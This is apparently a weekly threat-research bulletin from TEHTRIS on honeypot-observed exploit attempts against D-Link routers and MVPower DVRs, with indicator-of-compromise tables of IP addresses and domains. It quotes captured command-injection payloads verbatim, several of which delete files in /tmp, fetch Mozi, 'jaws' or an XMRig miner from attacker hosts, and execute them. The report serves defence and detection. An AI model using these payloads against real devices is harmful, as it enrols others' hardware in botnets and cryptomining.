This week, on TEHTRIS Deceptive Response Network, our Threat Research team monitored exploit attempts on vulnerable IoT devices such as D-Link routers and MVPower DVR, in attempts to enroll devices in botnets or to mine cryptocurrencies.
Exploit attempts on vulnerable D-Link routers
TEHTRIS observed malicious activities aiming at identifying and exploiting vulnerable D-Link routers.
Downloading Mozi botnet
These exploit attempts against vulnerable D-Link routers might be linked to a campaign uncovered by Palo Alto security researchers in August[1], which aimed at spreading MooBot, a variant of the Mirai malware botnet targeting vulnerable Linux devices. The compromised devices would then be part of a botnet army and be used to launch DDoS attacks.
The URL request is /HNAP1/. The HTTP header contains the following entries:
['soapaction: http://purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget http://101.0.32[.]235:58211/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`', 'content-type: text/xml; charset="utf-8"']- a “Soapaction” entry with a purenetworks URL (used to exploit the vulnerability)
- a sequence of Unix (Linux) commands to launch the following actions :
- cd /tmp : to move in the /tmp repertory (where all temporary files are located)
- rm -rf * : to delete all files located in the current folder (/tmp) to “clean” the environment and to make sure that the following steps run smoothly
- wget http://101.0.32[.]235:58211/Mozi.m : to download the file Mozi.m from the threat actor IP address on port 58211.
- chmod 777 /tmp/Mozi.m : to give execution rights to the file Mozi.m
- /tmp/Mozi.m : to execute the file Mozi.m (which is a botnet).
The following 34 IP addresses and ports were referred to in the wget command (IoC):
|
IP |
PORT |
COUNTRY |
AS |
|
102.33.43[.]180 |
41657 |
ZA |
AS327782 METROFIBRE-NETWORX |
|
103.177.184[.]238 |
35708 |
IN |
AS133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED |
|
103.183.33[.]151 |
44513 |
IN |
AS133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED |
|
111.61.154[.]108 |
52431 |
CN |
AS24547 HEBEI MOBILE COMMUNICATION COMPANY LIMITED |
|
112.248.121[.]159 |
41418 |
CN |
AS4837 CHINA UNICOM CHINA169 BACKBONE |
|
115.197.16[.]182 |
56929 |
CN |
AS4134 CHINANET |
|
115.208.130[.]40 |
56453 |
CN |
AS4134 CHINANET |
|
115.214.105[.]133 |
52092 |
CN |
AS4134 CHINANET |
|
115.52.21[.]98 |
36522 |
CN |
AS4837 CHINA UNICOM CHINA169 BACKBONE |
|
117.198.248[.]77 |
51366 |
IN |
AS9829 NATIONAL INTERNET BACKBONE |
|
117.217.146[.]136 |
57716 |
IN |
AS9829 NATIONAL INTERNET BACKBONE |
|
117.248.53[.]4 |
38607 |
IN |
AS9829 NATIONAL INTERNET BACKBONE |
|
117.63.41[.]64 |
51007 |
CN |
AS4134 CHINANET |
|
120.83.139[.]253 |
48258 |
CN |
AS17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE |
|
121.146.43[.]89 |
52936 |
KR |
AS4766 KOREA TELECOM |
|
123.10.134[.]251 |
34082 |
CN |
AS4837 CHINA UNICOM CHINA169 BACKBONE |
|
123.4.76[.]90 |
38002 |
CN |
AS4837 CHINA UNICOM CHINA169 BACKBONE |
|
124.91.229[.]171 |
42558 |
CN |
AS4837 CHINA UNICOM CHINA169 BACKBONE |
|
125.43.187[.]57 |
36302 |
CN |
AS4837 CHINA UNICOM CHINA169 BACKBONE |
|
163.125.14[.]69 |
44713 |
CN |
AS17623 CHINA UNICOM SHENZEN NETWORK |
|
182.119.203[.]8 |
33233 |
CN |
AS4837 CHINA UNICOM CHINA169 BACKBONE |
|
2.143.34[.]209 |
38389 |
ES |
AS3352 TELEFONICA DE ESPANA S.A.U. |
|
200.110.58[.]246 |
56319 |
BO |
AS27839 COMTECO LTDA |
|
202.164.131[.]68 |
47322 |
IN |
AS17465 CABLE ISP IN INDIA |
|
210.89.58[.]46 |
39424 |
IN |
AS133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED |
|
210.89.58[.]95 |
46472 |
IN |
AS133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED |
|
221.5.62[.]248 |
50039 |
CN |
AS17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE |
|
27.45.39[.]192 |
42667 |
CN |
AS17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE |
|
39.74.100[.]178 |
44354 |
CN |
AS4837 CHINA UNICOM CHINA169 BACKBONE |
|
42.228.194[.]25 |
45252 |
CN |
AS4837 CHINA UNICOM CHINA169 BACKBONE |
|
42.230.87[.]201 |
34163 |
CN |
AS4837 CHINA UNICOM CHINA169 BACKBONE |
|
58.46.196[.]9 |
36279 |
CN |
AS4134 CHINANET |
|
59.92.167[.]106 |
43448 |
IN |
AS9829 NATIONAL INTERNET BACKBONE |
Downloading a cryptominer
TEHTRIS also observed attempts to exploit D-Link routers vulnerabilities to download a cryptominer.
The HTTP header contains the following entries:
['accept-encoding: gzip, deflate', 'soapaction: "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp; rm -rf xmr*; pkill xmrig*; wget https[:]//github[.]com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz && tar -xvf xmrig-6.18.0-linux-x64.tar.gz && cd xmrig-6.18.0 && screen ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.test -p x -k --nicehash --coin monero -a rx/0; ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.test -p x -k --nicehash --coin monero -a rx/0`"', 'accept: */*', 'connection: keep-alive']The attacker tries to download the cryptominer XMRig from GitHub and to mine Monero cryptocurrency.
The following 4 IP addresses sent this request on TEHTRIS’ honeypots (IoC):
| IP | Country | AS |
| 34.159.120[.]11 | DE | AS396982 GOOGLE-CLOUD-PLATFORM |
| 34.89.116[.]57 | GB | |
| 104.196.255[.]198 | US | |
| 34.85.144[.]234 | US |
This type of headers (« soapaction: “http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && ») are used by a Metasploit module and can be customed with what is added afterwards. Therefore, it is a very well-known method and easily accessible to low-skilled hackers.
TEHTRIS recommends updating your D-Link routers to patch the vulnerabilities used in these kinds of attacks.
Mirai malware targeting vulnerable MVPower DVR
Moreover, TEHTRIS detected specific traces of the Mirai malware that turns Linux-running devices into remotely controlled bots. Indeed, http/HTTPS requests were associated to User Agents changed to “Hello, world”, which is typical of Mirai malware activities. This constitutes an initial step of the Mirai botnet before downloading malicious executables.
These malicious activities emanated from 465 different IP addresses during week 38.
The following request was observed:
/shell?cd+/tmp;rm+-rf+*;wget+185.216.71.192/jaws;sh+/tmp/jawsThe attacker tries to exploit a Shell Command Execution vulnerability on MVPower digital video recorders which may allow remote attackers to execute commands on vulnerable systems.
Malicious servers called by the wget command (IoC):
| IP / Domain Name | PORT | Country | ADDITIONAL INFORMATION |
| 103.159.64[.]218 | – | SG | AS395092 SHOCK-1 |
| 149.56.32[.]172 | – | CA | AS 16276 OVH SAS |
| 158.69.162[.]106 | – | CA | AS 16276 OVH SAS |
| 185.10.57[.]10 | – | NL | AS 51430 ALTUSHOST B.V. |
| 185.216.71[.]192 | – | NL |
AS 211252 DELIS LLC
More than 170 IP addresses conducting exploit attempts on TEHTRIS honeypots referred to this server. |
| 41.216.189[.]209 | – | DE |
AS 211138 PRIVATE-HOSTING DI CIPRIANO OSCAR
7 Chinese IP addresses conducting the attacks on TEHTRIS honeypots referred to this server. |
| 45.124.84[.]209 | – | VN | AS 135967 BACH KIM NETWORK SOLUTIONS JOIN STOCK COMPANY |
| 79.110.62[.]227 | – | US | AS 211252 DELIS LLC |
| 81.161.229[.]46 | – | US |
AS 211252 DELIS LLC More than 70 IP addresses conducting exploit attempts on TEHTRIS honeypots referred to this server. |
| 91.122.37[.]169 | – | RU | AS 12389 ROSTELECOM |
| 123.97.144[.]204 | 60082 | CN | AS 4134 CHINANET |
| 171.125.249[.]180 | 50882 | CN | AS 4837 CHINA UNICOM CHINA169 BACKBONE |
| 183.150.97[.]46 | 48304 | CN | AS 4134 CHINANET |
| 222.141.40[.]148 | 42134 | CN | AS 4837 CHINA UNICOM CHINA169 BACKBONE |
| 27.45.14[.]109 | 37775 | CN | AS 17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE |
| 41.86.19[.]86 | 40901 | LR | AS 37203 LIBTELCO |
| 42.238.249[.]137 | 40463 | CN | AS 4837 CHINA UNICOM CHINA169 BACKBONE |
| 46.10.229[.]163 | 53653 | BG | AS 8866 VIVACOM |
| botnet.psscc[.]cn | – | – |
Created on 2022-06-09 This domain name is associated with IP address 81.161.229[.]46 (AS 211252 DELIS LLC US), tagged as malicious on multiple public databases and referred to directly in some URL requests detected this week. |
| jx.qingdaosheng[.]com | – | – |
Created on 2022-03-20 This domain name is associated with IP address 156.234.211[.]155 (AS131685 SUN NETWORK HONG KONG LIMITED HK) and is listed on public blacklists. |
| networkmapping[.]xyz | – | – | This domain name is associated with IP address 20.187.116[.]78 (AS8075 Microsoft Corporation HK) flagged as malicious on multiple public databases. |
| whitesecurity[.]xyz | – | – |
Created on 2021-12-12 This domain name is associated with IP address 185.38.142[.]79 (AS47674 NET SOLUTIONS – CONSULTORIA EM TECNOLOGIAS DE INFORMACAO, PT) flagged as malicious on multiple public databases. |
TEHTRIS recommends blacklisting incoming flow from the above-mentioned IP addresses and domain names, as well as constantly updating your devices to patch vulnerabilities.